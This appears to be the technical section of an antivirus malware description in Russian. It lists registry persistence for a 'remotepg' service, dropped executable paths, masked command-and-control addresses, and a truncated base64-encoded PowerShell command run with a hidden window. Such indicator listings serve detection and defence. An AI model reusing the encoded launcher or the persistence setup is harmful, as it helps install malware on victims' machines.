Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\remotepg] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\remotepg] 'ImagePath' = '"%WINDIR%\SysWOW64\prnntfy\remotepg.exe"'
- 'remotepg' "%WINDIR%\SysWOW64\prnntfy\remotepg.exe"
- 'remotepg' %WINDIR%\SysWOW64\prnntfy\remotepg.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABGADEAaABqADcAXwByAD0AKAAoACcARQAnACsAJwA5AGIAJwApACsAKAAnADcAdAAnACsAJwB4ACcAKQArACcAcwAnACkAOwAmACgAJwBuACcAKwAnAGUAJwArACcAdwAtAGkAdABlAG0AJwApACAAJABFAE4AdgA6AFQARQBNAHAAXABXAG8AcgBEAF...
- %TEMP%\word\2019\p7hhgr.exe
- %WINDIR%\syswow64\prnntfy\remotepg.exe
- %TEMP%\word\2019\p7hhgr.exe в %WINDIR%\syswow64\prnntfy\remotepg.exe
- '17#.#1.218.65':80
- http://te###sign.com/stats/0W/
- http://17#.#1.218.65/t19yDh2JTP9/h2cFNG8jn2GOVfDiG/3T4FqUalk/Tp1NgjLhFSK/
- DNS ASK te###sign.com
- '%TEMP%\word\2019\p7hhgr.exe'
- '%WINDIR%\syswow64\prnntfy\remotepg.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABGADEAaABqADcAXwByAD0AKAAoACcARQAnACsAJwA5AGIAJwApACsAKAAnADcAdAAnACsAJwB4ACcAKQArACcAcwAnACkAOwAmACgAJwBuACcAKwAnAGUAJwArACcAdwAtAGkAdABlAG0AJwApACAAJABFAE4AdgA6AFQARQBNAHAAXABXAG8AcgBEAF...' (со скрытым окном)